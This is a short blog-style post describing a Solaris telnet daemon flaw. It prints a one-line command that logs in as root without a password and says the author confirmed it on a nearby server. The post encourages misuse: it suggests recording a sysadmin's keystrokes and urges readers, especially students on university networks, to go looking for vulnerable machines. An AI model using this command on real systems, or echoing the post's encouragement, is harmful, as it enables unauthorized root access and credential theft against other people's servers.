
If you happen to find a Sun Solaris server with a telnet daemon running, it is very likely that you can get superuser access on it by just typing:

$ telnet -l "-froot" server

where server is the server name. I was able to confirm this on a Solaris server nearby.

It’s amazing to see that this one was overlooked for SO much time, and how using this exploit does not require any skill whatsoever. If root logins through telnet are disabled, you may still be able to log in as any other user (think sysadmin’s user account + keystroke recorder).

While the telnet port is usually blocked to servers on the internet, it is quite common that it is left open inside local networks, and especially in universities. So go ahead and look for Solaris rootkits — the exam period is just around the corner :)

Source: Errata Security blog.
